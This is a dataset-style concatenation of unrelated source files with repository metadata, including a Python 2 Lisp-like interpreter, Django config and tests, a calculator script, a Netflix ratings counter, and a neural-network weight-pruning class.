        head = self.parse_expr()
        """:type :Node"""
        if head is not None:
            head.next = self._parse_expr_list()
        return head
class CuteInterpreter(object):
    # Evaluates parse-tree Nodes produced by BasicPaser.
    # Shared singleton nodes used for all boolean results.
    TRUE_NODE = Node(TokenType.TRUE)
    FALSE_NODE = Node(TokenType.FALSE)
    def run_arith(self, arith_node):
        """Evaluate a binary arithmetic form (+ - * /); returns an INT Node."""
        rhs1 = arith_node.next
        rhs2 = rhs1.next if rhs1.next is not None else None
        left = self.run_expr(rhs1)
        right = self.run_expr(rhs2)
        result = Node(TokenType.INT)
        if arith_node.type is TokenType.PLUS:
            result.value = int(left.value) + int(right.value)
        elif arith_node.type is TokenType.MINUS:
            result.value = int(left.value) - int(right.value)
        elif arith_node.type is TokenType.TIMES:
            result.value = int(left.value) * int(right.value)
        elif arith_node.type is TokenType.DIV:
            # NOTE(review): plain '/' is floor division under Python 2 (this
            # file's dialect) but true division under Python 3.
            result.value = int(left.value) / int(right.value)
        return result
    def run_func(self, func_node):
        """Evaluate a builtin function form (car/cdr/cons, predicates,
        comparisons, not, cond).  func_node is the operator node; its
        siblings are the (unevaluated) arguments."""
        rhs1 = func_node.next
        rhs2 = rhs1.next if rhs1.next is not None else None
        def create_quote_node(node, list_flag = False):
            """
            Create a QUOTE node whose next is *node* and return it wrapped
            in a LIST node.  When list_flag is True, *node* is first wrapped
            in an inner LIST node which becomes the QUOTE's next.
            The final return value is the LIST whose value is the new QUOTE.
            """
            q_node = Node(TokenType.QUOTE)
            if list_flag:
                inner_l_node = Node(TokenType.LIST, node)
                q_node.next = inner_l_node
            else:
                q_node.next = node
            l_node = Node(TokenType.LIST, q_node)
            return l_node
        def is_quote_list(node):
            "Check whether the QUOTE's next is a list (i.e. node is '( ... ))."
            if node.type is TokenType.LIST:
                if node.value.type is TokenType.QUOTE:
                    if node.value.next.type is TokenType.LIST:
                        return True
            return False
        def pop_node_from_quote_list(node):
            "Extract the value of the list node hanging off the quote."
            if not is_quote_list(node):
                return node
            return node.value.next.value
        def list_is_null(node):
            "Check whether the given node is a null list."
            node = pop_node_from_quote_list(node)
            if node is None:return True
            return False
        if func_node.type is TokenType.CAR:
            rhs1 = self.run_expr(rhs1)
            if not is_quote_list(rhs1):
                print ("car error!")
            result = pop_node_from_quote_list(rhs1)
            # Atoms are returned bare; lists are re-quoted.
            if result.type is not TokenType.LIST:
                return result
            return create_quote_node(result)
        elif func_node.type is TokenType.CDR:
            rhs1 = self.run_expr(rhs1)
            if not is_quote_list(rhs1):
                print("cdr error!")
            result = pop_node_from_quote_list(rhs1)
            q_node = Node(TokenType.LIST, result.next)
            return create_quote_node(q_node)
        elif func_node.type is TokenType.CONS:
            expr_rhs1 = self.run_expr(rhs1)
            expr_rhs2 = self.run_expr(rhs2)
            # A list head is nested as a sub-list; an atom head is linked
            # directly in front of the tail list.
            if is_quote_list(expr_rhs1):
                head = Node(TokenType.LIST, pop_node_from_quote_list(expr_rhs1))
            else:
                head = pop_node_from_quote_list(expr_rhs1)
            head.next = pop_node_from_quote_list(expr_rhs2)
            q_node = Node(TokenType.LIST, head)
            return create_quote_node(q_node)
        elif func_node.type is TokenType.ATOM_Q:
            if list_is_null(rhs1): return self.TRUE_NODE
            if rhs1.type is not TokenType.LIST: return self.TRUE_NODE
            if rhs1.type is TokenType.LIST:
                if rhs1.value.type is TokenType.QUOTE:
                    # NOTE(review): this compares a Node against the int
                    # constant TokenType.LIST, so it is always true --
                    # probably meant 'rhs1.value.next.type'.  Verify.
                    if rhs1.value.next is not TokenType.LIST:
                        return self.TRUE_NODE
            return self.FALSE_NODE
        elif func_node.type is TokenType.EQ_Q:
            if rhs1.type is TokenType.INT:
                # NOTE(review): identity comparison of lexeme strings; relies
                # on CPython small-string interning rather than '=='.
                if rhs1.value is rhs2.value:
                    return self.TRUE_NODE
            return self.FALSE_NODE
        elif func_node.type is TokenType.NULL_Q:
            if list_is_null(rhs1): return self.TRUE_NODE
            return self.FALSE_NODE
        elif func_node.type is TokenType.GT:
            expr_rhs1 = self.run_expr(rhs1)
            expr_rhs2 = self.run_expr(rhs2)
            if int(expr_rhs1.value) > int(expr_rhs2.value):
                return self.TRUE_NODE
            else:
                return self.FALSE_NODE
        elif func_node.type is TokenType.LT:
            expr_rhs1 = self.run_expr(rhs1)
            expr_rhs2 = self.run_expr(rhs2)
            if int(expr_rhs1.value) < int(expr_rhs2.value):
                return self.TRUE_NODE
            else:
                return self.FALSE_NODE
        elif func_node.type is TokenType.EQ:
            expr_rhs1 = self.run_expr(rhs1)
            expr_rhs2 = self.run_expr(rhs2)
            if int(expr_rhs1.value) == int(expr_rhs2.value):
                return self.TRUE_NODE
            else:
                return self.FALSE_NODE
        elif func_node.type is TokenType.NOT:
            # Booleans are compared via their printed form.
            expr_rhs1 = self.run_expr(rhs1)
            if str(expr_rhs1) == str(self.FALSE_NODE):
                return self.TRUE_NODE
            elif str(expr_rhs1) == str(self.TRUE_NODE):
                return self.FALSE_NODE
        elif func_node.type is TokenType.COND:
            # Walk the clause list; evaluate the first clause whose
            # condition evaluates to #T.
            while rhs1 is not None:
                condition = rhs1.value
                result = condition.next
                if self.run_expr(condition).type is TokenType.TRUE:
                    return self.run_expr(result)
                else:
                    rhs1 = rhs1.next
            return None
        else:
            return None
    def run_expr(self, root_node):
        """Evaluate any expression node: atoms self-evaluate, lists dispatch
        to run_list.
        :type root_node: Node
        """
        if root_node is None:
            return None
        if root_node.type is TokenType.ID:
            return root_node
        elif root_node.type is TokenType.INT:
            return root_node
        elif root_node.type is TokenType.TRUE:
            return root_node
        elif root_node.type is TokenType.FALSE:
            return root_node
        elif root_node.type is TokenType.LIST:
            return self.run_list(root_node)
        else:
            print "Run Expr Error"
            return None
    def run_list(self, l_node):
        """Dispatch a LIST node on its operator: builtin function,
        arithmetic, quoted data (self-evaluating), or error.
        :type l_node:Node
        """
        op_code = l_node.value
        if op_code is None:
            return l_node
        if op_code.type in \
        [TokenType.CAR, TokenType.CDR, TokenType.CONS, TokenType.ATOM_Q,\
         TokenType.EQ_Q, TokenType.NULL_Q, TokenType.NOT, \
         TokenType.GT, TokenType.LT, TokenType.EQ, TokenType.COND]:
            return self.run_func(op_code)
        if op_code.type in \
        [TokenType.PLUS, TokenType.MINUS, TokenType.TIMES, \
         TokenType.DIV]:
            return self.run_arith(op_code)
        if op_code.type is TokenType.QUOTE:
            return l_node
        else:
            print "application: not a procedure;"
            print "expected a procedure that can be applied to arguments"
            print "Token Type is "+ op_code.value
            return None
def print_node(node):
    """
    Render an evaluation result as printable text.
    Input is a List Node or an atom.
    :type node: Node
    """
    def print_list(node):
        """
        Print the value of a LIST node: for input ( 2 3 ) both 2 and 3
        are rendered.
        :type node: Node
        """
        def print_list_val(node):
            # Render this node and all of its siblings, space-separated.
            if node.next is not None:
                return print_node(node)+" "+print_list_val(node.next)
            return print_node(node)
        # NOTE(review): falls through (returns None) for non-LIST input.
        if node.type is TokenType.LIST:
            if node.value.type is TokenType.QUOTE:
                return print_node(node.value)
            return "("+print_list_val(node.value)+")"
    if node is None:
        return ""
    if node.type in [TokenType.ID, TokenType.INT]:
        return node.value
    if node.type is TokenType.TRUE:
        return "#T"
    if node.type is TokenType.FALSE:
        return "#F"
    if node.type is TokenType.PLUS:
        return "+"
    if node.type is TokenType.MINUS:
        return "-"
    if node.type is TokenType.TIMES:
        return "*"
    if node.type is TokenType.DIV:
        return "/"
    if node.type is TokenType.GT:
        return ">"
    if node.type is TokenType.LT:
        return "<"
    if node.type is TokenType.EQ:
        return "="
    if node.type is TokenType.LIST:
        return print_list(node)
    if node.type is TokenType.ATOM_Q:
        return "atom?"
    if node.type is TokenType.CAR:
        return "car"
    if node.type is TokenType.CDR:
        return "cdr"
    if node.type is TokenType.COND:
        return "cond"
    if node.type is TokenType.CONS:
        return "cons"
    if node.type is TokenType.LAMBDA:
        return "lambda"
    if node.type is TokenType.NULL_Q:
        return "null?"
    if node.type is TokenType.EQ_Q:
        return "eq?"
    if node.type is TokenType.NOT:
        return "not"
    if node.type is TokenType.QUOTE:
        return "'"+print_node(node.next)
def Test_method(input):
    # Scan, parse and evaluate one source line, then print the result
    # after a "... " prompt.  (Parameter name shadows the builtin input.)
    test_cute = CuteScanner(input)
    test_tokens=test_cute.tokenize()
    test_basic_paser = BasicPaser(test_tokens)
    node = test_basic_paser.parse_expr()
    cute_inter = CuteInterpreter()
    result = cute_inter.run_expr(node)
    print "... ",
    print print_node(result)
def Test_All():
    # Interactive REPL: read a line and evaluate it, forever.
    while 1:
        test_inter = raw_input("> ")
        Test_method(test_inter)
# Start the REPL when the module is executed/imported.
Test_All()
| [
"geniusry@naver.com"
] | geniusry@naver.com |
cd47f62822b1151340a50de2d7fbd3314f87f456 | 23b7798eba392235ef0adc62869e4e27736f7749 | /src/restaurant_researcher/wsgi.py | 4210d0ac5fc17e03c973ba747e898de27a634be0 | [] | no_license | kathryn0908/restaurant_api | f802072077c2c4e7b81dba5b95482888d5c1cbe9 | 215e3112e9b47577b440e5f1e3d28423cad177f6 | refs/heads/master | 2022-11-30T02:01:30.809491 | 2020-08-05T16:36:15 | 2020-08-05T16:36:15 | 274,771,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | """
WSGI config for restaurant_researcher project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before building the app.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'restaurant_researcher.settings')
# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) import.
application = get_wsgi_application()
| [
"kathrynlael@gmail.com"
] | kathrynlael@gmail.com |
4a5c5376aa7ce609fdb64cecfb2774f44dbc8725 | cf0480eb13906bf6e2c46bfe09b864ee9bbf6776 | /Functions/Calc/Calc_1.py | 3b600966f2c62976f2522ee032f37f2d17a06b1c | [] | no_license | ravi4all/Python_JuneRegular_Evening | f7afb665541b88a9cb6ce89a488a32120f63dd6b | ad6e17c4acdcb2c669ba0508b12aeca8bdab8976 | refs/heads/master | 2020-03-20T21:20:36.763561 | 2018-07-06T11:26:52 | 2018-07-06T11:26:52 | 137,736,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | print("""
1. Add
2. Sub
3. Mul
4. Div
""")
user_choice = input("Enter your choice : ")
num_1 = int(input("Enter first number : "))
num_2 = int(input("Enter second number : "))
if user_choice == "1":
    result = num_1 + num_2
    print("Sum is",result)
elif user_choice == "2":
    result = num_1 - num_2
    print("Diff is", result)
# BUG FIX: the menu advertises Mul (3) and Div (4) but the old code had no
# branches for them and gave no feedback for an invalid choice.
elif user_choice == "3":
    result = num_1 * num_2
    print("Product is", result)
elif user_choice == "4":
    if num_2 == 0:
        print("Cannot divide by zero")
    else:
        result = num_1 / num_2
        print("Quotient is", result)
else:
    print("Invalid choice")
| [
"noreply@github.com"
] | noreply@github.com |
abc693b61aa74343a53bf216a81b234375a2d68f | a50b7b55ce92e4ad9e6020184dfd1a90319374ab | /src/veggies/migrations/0010_remove_food_to_substitute_show_on_view.py | 6469e9c072ec08748a1f59fe63d3078472adbd17 | [] | no_license | AdamGinna/DockerVeggies | bdb48af93b06a67a8a86a478585dedd80e236f5c | c43bd382775b46e566e7296b7a2f541453539bfd | refs/heads/master | 2023-04-24T20:22:38.618557 | 2021-05-03T17:42:51 | 2021-05-03T17:42:51 | 361,412,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | # Generated by Django 2.2.7 on 2020-04-01 11:10
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: drops the ``show_on_view`` field
    # from the ``food_to_substitute`` model.
    dependencies = [
        ('veggies', '0009_auto_20200401_1107'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='food_to_substitute',
            name='show_on_view',
        ),
    ]
| [
"adam.ginna.work@gmail.com"
] | adam.ginna.work@gmail.com |
2c80f7d7ae8727f7b54b96f32435206ead344557 | 99a018f99af4ebff2e1ac6029ad6307ffa558e37 | /src/powergrader/processors/base.py | 7f34578f72617911f71784dd8ff7c1fa1e6da0ef | [] | no_license | kuboschek/powergrader | e558f7fdb9b55624d25076bec388359e47aa073c | eef6d813fa064b8a3921fea5047d71c5f1891475 | refs/heads/master | 2021-05-03T07:53:58.017849 | 2016-05-26T18:35:07 | 2016-05-26T18:35:07 | 53,963,853 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 749 | py | #!/usr/bin/env python
import datetime
from helpers import get_ex_dir
class BaseProcessor(object):
    """No-op processor base class: produces an empty list of deductions."""
    def __init__(self, exname, filenames, testcases):
        self.exname = exname
        # Resolve the exercise directory once at construction time.
        self.ex_dir = get_ex_dir(exname)
        self.filenames = filenames
        self.testcases = testcases
    def get_name(self):
        """Identifier recorded in the generated report."""
        return "base"
    def run(self, uname):
        """Return the list of deductions for *uname* (none in the base class)."""
        return []
    def process(self, uname):
        """Build the report object wrapping this processor's deductions."""
        return {
            'generated-by': self.get_name(),
            'timestamp': datetime.datetime.now().isoformat(),
            'deductions': self.run(uname),
        }
| [
"x32000@gmail.com"
] | x32000@gmail.com |
3d7d70c65db095cbce34a2025152ea993cae07f3 | c9ab887d14e6a9a003bd7033a2c2af08c4a6b1d6 | /hvenv/Scripts/django-admin.py | 8fd4a15b766d207c1e5311cbc5444d177472d61a | [] | no_license | haezoo/my-first-blog | 2c74991b157099e4eb7a22cc8b4eb27e61c6019b | deebff8ecdcd883db4669c2080b941584f607830 | refs/heads/master | 2020-04-10T10:26:49.484791 | 2018-12-08T21:44:38 | 2018-12-08T21:44:38 | 160,966,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | #!c:\djangogirls\hvenv\scripts\python.exe
from django.core import management
# Entry point for this virtualenv's django-admin command-line utility.
if __name__ == "__main__":
    management.execute_from_command_line()
| [
"heatherltoll@gmail"
] | heatherltoll@gmail |
df6cbd2525ccf0b8c651166827b6e67a7a5d0630 | f30a1dcb8a4134aed5f1635799ccceedb590d77a | /kmeans_knn_ratingPrediction_moviePrediction_analysis_000/misc/build_num_ratings_per_movie.py | 58dc8d490857c41df3ce193969d62f9484281234 | [] | no_license | Willian-Girao/Clustering-Recommendation-Netflix | aecc951106d3dfc827b24ca6f6182a19a13510c4 | f4655c93803d9b4b3f7a337fc54cc4c6980b6563 | refs/heads/master | 2020-06-10T03:38:31.222618 | 2019-09-22T17:56:39 | 2019-09-22T17:56:39 | 193,571,046 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,193 | py | #!/usr/bin/env python
import os
import csv
# Getting all per-movie rating files within the target directory.
movies_files = os.listdir('training_set/')
# (movie_id, rating_count) pairs, filled below and then sorted.
ratings_array = []
# Looping through each file found.  Each file starts with a
# "<movie_id>:" header line followed by one rating per line.
for movie_file in movies_files:
    movie_id = ""
    movie_id_retrieved = False
    ratings_count = 0
    # 'with' closes the file even on error (old code leaked handles on
    # exceptions) and counting only non-header lines fixes the old
    # count-then-subtract approach, which produced -1 for an empty file.
    with open('training_set/' + movie_file, "r") as movie_ratings:
        for line in movie_ratings:
            if not movie_id_retrieved:
                movie_id = line.replace(':', '').replace('\n', '')
                movie_id_retrieved = True
            else:
                ratings_count += 1
    # Saving movie id and rating count to array.
    ratings_array.append([str(movie_id), int(ratings_count)])
    print("> file '" + movie_file + "' finished parsing.")
# Most-rated movies first.
ratings_array.sort(key=lambda pair: pair[1], reverse=True)
# Append "<movie_id> <count>" lines to the output file (opened only now,
# instead of being held open during the whole parse).
with open("movies_rateCount.txt", "a+") as final_file:
    for movie_id, count in ratings_array:
        final_file.write(str(movie_id) + " " + str(count) + "\n")
| [
"williansoaresgirao@gmail.com"
] | williansoaresgirao@gmail.com |
f6e85541c1404ada5258f7f24c2b9c8480cd87f4 | ccf57c5b03b602ee0a2f13a9299958d9d5a30e91 | /根据股票代码获取当前数据.py | 44fe0ab70287253b330552b111ff3a7ab42e5a3f | [] | no_license | mrwtx1618/py_all | e4e4c0214223d44ff4d5499311b87ae5cfe33dc9 | fa3955382229f91c739bda2d57d0b42b885f9c9b | refs/heads/master | 2021-08-28T14:08:27.578827 | 2017-12-12T12:18:24 | 2017-12-12T12:18:24 | 113,982,790 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 2,228 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import re
import datetime
def getStockInfo(url):
    """Fetch a Sina quote URL and return its comma-separated fields as a list.

    The Sina endpoint returns one line of the form
    var hq_str_...="<name>,<price>,<change>,..."; splitting on ',' yields the
    individual quote fields consumed by printStock().
    Python 2 only (urllib2).
    """
    stockList = []
    request = urllib2.Request(url)
    response = urllib2.urlopen(request)
    # NOTE(review): the response object is never closed; relies on GC.
    stockStr = response.read()
    stockList = stockStr.split(',')
    return stockList
def printStock(List):
    """Print the price/volume fields of a quote record from getStockInfo().

    Indices 1-5 of the Sina quote string are printed; Python 2 print
    statements.  NOTE(review): the parameter name `List` shadows no builtin
    but is easily confused with `list`.
    """
    print '***********price*****************' + List[1]
    print '***********float_price***********' + List[2]
    print '***********float_perct***********' + List[3] + '%'
    print '***********succ_unit*************' + List[4]+' shou'
    print '***********succ_price************' + List[5]
def getUrlByCode(code):
    """Build the Sina quote URL for a stock code.

    'sh', 'sz' and 'cyb' map to the three market indices; any other code is
    routed by exchange: codes starting with '6' are Shanghai ('sh'),
    everything else Shenzhen ('sz').
    """
    index_urls = {
        'sh': 'http://hq.sinajs.cn/list=s_sh000001',
        'sz': 'http://hq.sinajs.cn/list=s_sz399001',
        'cyb': 'http://hq.sinajs.cn/list=s_sz399006',
    }
    if code in index_urls:
        return index_urls[code]
    # Equivalent to the original regex r'^60*' anchored match.
    market = 'sh' if code.startswith('6') else 'sz'
    return 'http://hq.sinajs.cn/list=s_' + market + code
#输入stock代码输出对应的价格信息
#code = raw_input('code: ')
codeDict = {
'sh' : 'shang hai zq',
'sz' : 'shen zheng zq',
'cyb' : 'chang ye ban',
'601788' : 'guang da zheng quan',
'000651' : 'ge li dian qi',
}
#http://hq.sinajs.cn/list=s_sh000001 (上海大盘查询)
#http://hq.sinajs.cn/list=s_sz399001 (深圳大盘查询)
count = 0;
while (count<=100):#循环100次后再退出
# 循环字典
for key in codeDict:
print key + '--'+codeDict[key]
code = raw_input('please select a code: ')
now_time = datetime.datetime.now()
#打印该code的信息
url = getUrlByCode(code)
stockInfo = getStockInfo(url)
#print stockInfo
printStock(stockInfo)
end_time = datetime.datetime.now()
costTime = (end_time - now_time).seconds
print '总共花费时间'+str(costTime)+'秒'
count +=1 | [
"13110180012@fudan.edu.cn"
] | 13110180012@fudan.edu.cn |
b73c3fb36f61b44c607e0a663ff232dd7a06ce78 | 3cab75b3c7065c4c6c021ceb41564bfa941b53e8 | /lists/tests.py | a940a569e58435a2481d62f0a7facc1ade5195c2 | [
"MIT"
] | permissive | linzeyang/testing_goat | 1809020791946e4b39d68ecda062612144309afb | 9e3ff82d2d24383be4dd2c693ac5a962f503c2c5 | refs/heads/master | 2021-01-23T16:35:37.068794 | 2014-02-11T14:42:43 | 2014-02-11T14:42:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,168 | py | from django.core.urlresolvers import resolve
from django.test import TestCase
from django.http import HttpRequest
from django.template.loader import render_to_string
from lists.models import Item, List
from lists.views import home_page
# Create your tests here.
class ListAndItemModelsTest(TestCase):
    """Model-layer tests: Items persist, keep insertion order, and link to a List."""

    def test_saving_and_retrieving_items(self):
        # Parent list the items will belong to.
        list_ = List()
        list_.save()
        first_item = Item()
        first_item.text = 'The first (ever) list item'
        first_item.list = list_
        first_item.save()
        second_item = Item()
        second_item.text = 'Item the second'
        second_item.list = list_
        second_item.save()
        saved_list = List.objects.first()
        self.assertEqual(saved_list, list_)
        saved_items = Item.objects.all()
        self.assertEqual(saved_items.count(), 2)
        # Default ordering returns items in insertion order.
        first_saved_item = saved_items[0]
        second_saved_item = saved_items[1]
        self.assertEqual(first_saved_item.text, 'The first (ever) list item')
        self.assertEqual(first_saved_item.list, list_)
        self.assertEqual(second_saved_item.text, 'Item the second')
        self.assertEqual(second_saved_item.list, list_)
class HomePageTest(TestCase):
    """Tests for '/' URL routing and the home_page view's rendered output."""

    def test_root_url_resolves_to_home_page_view(self):
        # resolve() maps '/' back to the view function registered in urls.py.
        found = resolve('/')
        self.assertEqual(found.func, home_page)

    def test_home_page_returns_correct_html(self):
        # Call the view directly and compare against the rendered template
        # rather than hand-written HTML.
        request = HttpRequest()
        response = home_page(request)
        expect_html = render_to_string('home.html')
        self.assertEqual(response.content.decode(), expect_html)
class ListViewTest(TestCase):
    """Tests for the per-list view at /lists/<id>/."""

    def test_uses_list_template(self):
        list_ = List.objects.create()
        response = self.client.get('/lists/%d/' % list_.id)
        self.assertTemplateUsed(response, 'list.html')

    def test_displays_only_items_for_that_list(self):
        # Two lists with two items each; only the requested list's items
        # should appear in the response.
        correct_list = List.objects.create()
        Item.objects.create(text='itemey 1', list=correct_list)
        Item.objects.create(text='itemey 2', list=correct_list)
        other_list = List.objects.create()
        Item.objects.create(text='other list item 1', list=other_list)
        Item.objects.create(text='other list item 2', list=other_list)
        response = self.client.get('/lists/%d/' % correct_list.id)
        self.assertContains(response, 'itemey 1')
        self.assertContains(response, 'itemey 2')
        self.assertNotContains(response, 'other list item 1')
        self.assertNotContains(response, 'other list item 2')
class NewListTest(TestCase):
    """Tests for POSTing to /lists/new (list creation)."""

    def test_saving_a_POST_request(self):
        response = self.client.post('/lists/new',
                                    data={'item_text': 'A new list item'})
        self.assertEqual(Item.objects.count(), 1)
        new_item = Item.objects.first()
        self.assertEqual(new_item.text, "A new list item")

    def test_redirects_after_POST(self):
        # POST-redirect-GET: creation should redirect to the new list's page.
        response = self.client.post('/lists/new',
                                    data={'item_text': 'A new list item'})
        new_list = List.objects.first()
        self.assertRedirects(response, '/lists/%d/' % new_list.id)
class NewItemTest(TestCase):
    """Tests for POSTing a new item to an existing list (/lists/<id>/new_item)."""

    def test_can_save_a_POST_request_to_an_existing_list(self):
        # other_list exists to prove the item is attached to the right list.
        other_list = List.objects.create()
        correct_list = List.objects.create()
        self.client.post('/lists/%d/new_item' % correct_list.id,
                         data={'item_text': 'A new item for an existing list'})
        self.assertEqual(Item.objects.count(), 1)
        new_item = Item.objects.first()
        self.assertEqual(new_item.text, 'A new item for an existing list')
        self.assertEqual(new_item.list, correct_list)

    def test_redirects_to_list_view(self):
        other_list = List.objects.create()
        correct_list = List.objects.create()
        response = self.client.post('/lists/%d/new_item' % correct_list.id,
                                    data={
                                        'item_text': 'A new item for an existing list'
                                    })
        self.assertRedirects(response, '/lists/%d/' % correct_list.id)
| [
"zeyanglin2013@gmail.com"
] | zeyanglin2013@gmail.com |
030567038e4e134b0730539fcc924b6029a5698b | c8675ec0ac3e7036990aa255c1f82e476e9bed7b | /fineprune/mid_datasetgrad_optim.py | 946514ad47b11ff6105e82f704315e4429c97e51 | [] | no_license | ziqi-zhang/Renofeation | c74bfc040be6c131d250cf8a2bb2ab7c09e69ad0 | a2f9ad692799692d3db07fca30d25c3c05923449 | refs/heads/master | 2023-07-27T18:51:48.093837 | 2021-09-02T02:56:07 | 2021-09-02T02:56:07 | 269,360,779 | 0 | 0 | null | 2020-06-04T13:01:00 | 2020-06-04T13:00:59 | null | UTF-8 | Python | false | false | 4,258 | py | import os
import os.path as osp
import sys
import time
import argparse
from pdb import set_trace as st
import json
import random
from functools import partial
from operator import itemgetter
from heapq import nsmallest
import copy
import torch
import numpy as np
import torchvision
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchcontrib
from torchvision import transforms
from advertorch.attacks import LinfPGDAttack
from dataset.cub200 import CUB200Data
from dataset.mit67 import MIT67Data
from dataset.stanford_dog import SDog120Data
from dataset.caltech256 import Caltech257Data
from dataset.stanford_40 import Stanford40Data
from dataset.flower102 import Flower102Data
from model.fe_resnet import resnet18_dropout, resnet50_dropout, resnet101_dropout
from model.fe_mobilenet import mbnetv2_dropout
from model.fe_resnet import feresnet18, feresnet50, feresnet101
from model.fe_mobilenet import fembnetv2
from eval_robustness import advtest, myloss
from utils import *
from fineprune.finetuner import Finetuner
from fineprune.global_datasetgrad_optim_iter import GlobalDatasetGradOptimIter
class MidDeltaW(GlobalDatasetGradOptimIter):
    """Band pruner: zeroes conv weights whose accumulated-gradient magnitude
    falls in a middle percentile band [low_ratio, low_ratio + ratio_interval].

    Relies on the parent class to populate `module.weight.grad_log` during
    process_epoch() — presumably an accumulated gradient statistic per weight;
    TODO confirm against GlobalDatasetGradOptimIter.
    """

    def __init__(
        self,
        args,
        model,
        teacher,
        train_loader,
        test_loader,
    ):
        # All setup (logging, optimizers, etc.) is inherited unchanged.
        super(MidDeltaW, self).__init__(
            args, model, teacher, train_loader, test_loader
        )

    def conduct_prune(
        self,
        low_ratio, ratio_interval,
    ):
        """Zero conv weights whose |grad_log| lies between the low_ratio and
        (low_ratio + ratio_interval) percentiles (the middle band); weights
        below and above the band are kept.  Raises RuntimeError if any layer
        would end up with zero surviving weights.
        """
        # Percentile thresholds must be computed on CPU over all conv weights.
        model = self.model.cpu()
        total = 0
        for name, module in model.named_modules():
            if ( isinstance(module, nn.Conv2d) ):
                total += module.weight.data.numel()
        # Flatten every conv layer's |grad_log| into one vector for a global sort.
        conv_weights = torch.zeros(total)
        index = 0
        for name, module in model.named_modules():
            if ( isinstance(module, nn.Conv2d) ):
                size = module.weight.data.numel()
                conv_weights[index:(index+size)] = module.weight.grad_log.view(-1).abs().clone()
                index += size
        y, i = torch.sort(conv_weights)
        # Band boundaries by rank in the sorted magnitudes.
        low_thre_index = int(total * low_ratio)
        low_thre = y[low_thre_index]
        high_thre_index = int(total * (low_ratio+ratio_interval))
        if high_thre_index >= len(y):
            high_thre_index = len(y)-1
        high_thre = y[high_thre_index]
        log = f"Pruning threshold: {low_thre:.4f} to {high_thre:.4f}"
        self.prune_record(log)
        pruned = 0
        zero_flag = False
        for name, module in model.named_modules():
            if ( isinstance(module, nn.Conv2d) ):
                # Prune conv1 is better
                # if name == "conv1":
                #     continue
                weight_copy = module.weight.grad_log.abs().clone()
                # Keep weights OUTSIDE the band (above high or below low);
                # the mask is 1 where kept, 0 where pruned.
                mask = weight_copy.gt(high_thre).float() + weight_copy.lt(low_thre).float()
                pruned = pruned + mask.numel() - torch.sum(mask)
                # np.random.shuffle(mask)
                module.weight.data.mul_(mask)
                if int(torch.sum(mask)) == 0:
                    zero_flag = True
                remain_ratio = int(torch.sum(mask)) / mask.numel()
                log = (f"layer {name} \t total params: {mask.numel()} \t "
                    f"remaining params: {int(torch.sum(mask))}({remain_ratio:.2f})")
                self.prune_record(log)
        if zero_flag:
            raise RuntimeError("There exists a layer with 0 parameters left.")
        log = (f"Total conv params: {total}, Pruned conv params: {pruned}, "
            f"Pruned ratio: {pruned/total:.2f}")
        self.prune_record(log)
        # Move back to GPU after in-place CPU masking.
        self.model = model.cuda()

    def snip_weight_prune(self, low_ratio, ratio_interval):
        # process_epoch() (inherited) accumulates grad_log before pruning.
        self.process_epoch()
        # self.normalize_ranks()
        self.conduct_prune(low_ratio, ratio_interval)

    def init_prune(self):
        """Entry point: run one pruning pass using ratios from CLI args."""
        low_ratio = self.args.weight_init_prune_ratio
        ratio_interval = self.args.weight_ratio_per_prune
        log = f"Init prune ratio {low_ratio:.2f}, interval {ratio_interval:.2f}"
        self.prune_record(log)
        self.snip_weight_prune(low_ratio, ratio_interval)
        self.check_param_num()
| [
"ziqi_zhang@pku.edu.cn"
] | ziqi_zhang@pku.edu.cn |
d2f30985dff53befafcdbff29343246a2e7fff4c | a78c8cb4a3c41f39edbfd150467ccc4b837b1696 | /python_crash_course/chapter_3_lists/bicycles.py | 0ed3e0a37d0b866b3575a16481a4b0bb0f577812 | [] | no_license | shayroy/ChamplainVR | f1ed509edbfb4a735092dd8960d5c6860ea8055b | 3d9d8318024fbfb25a8bbdb5315072fe148c5311 | refs/heads/master | 2020-04-03T16:18:46.434730 | 2019-03-08T23:17:15 | 2019-03-08T23:17:15 | 155,399,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | bicycles = ['trek', 'cannondale', 'redline', 'specialized']
print(bicycles)
print(bicycles[0])
print(bicycles[0].title())
print(bicycles[1])
print(bicycles[3])
print(bicycles[-1])
message = "My first bicycle was a " + bicycles[0].title() + "."
print(message) | [
"2shayroy@gmail.com"
] | 2shayroy@gmail.com |
f57ba3f42f0fa8e30c8a1dd086d3ee1c1ee35d4e | a68883f6cdb5e607d89b7afa94e68023c132055c | /tests/test_time_off.py | bbd96fbd8ef4da14a073179a345c1cb7333281fe | [
"MIT"
] | permissive | JosephvB-JBA/PyBambooHR | 2e62e246ffe4eaa85e824aa6a232f502e3395747 | e3c83f9bfcd8f6703e220462ea1aa06703632441 | refs/heads/master | 2020-11-28T05:22:33.919602 | 2019-12-24T09:44:56 | 2019-12-24T09:44:56 | 229,715,301 | 0 | 0 | MIT | 2019-12-24T09:44:57 | 2019-12-23T09:00:37 | null | UTF-8 | Python | false | false | 6,169 | py | """Unittests for time off api
"""
import httpretty
import os
import sys
import unittest
from json import dumps
from requests import HTTPError
# Force parent directory onto path
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from PyBambooHR import PyBambooHR
class test_time_off(unittest.TestCase):
    """Tests for the PyBambooHR time-off API, with HTTP mocked by httpretty."""

    # Used to store the cached instance of PyBambooHR
    bamboo = None

    def setUp(self):
        # Lazily create one client; the API key is fake, all HTTP is mocked.
        if self.bamboo is None:
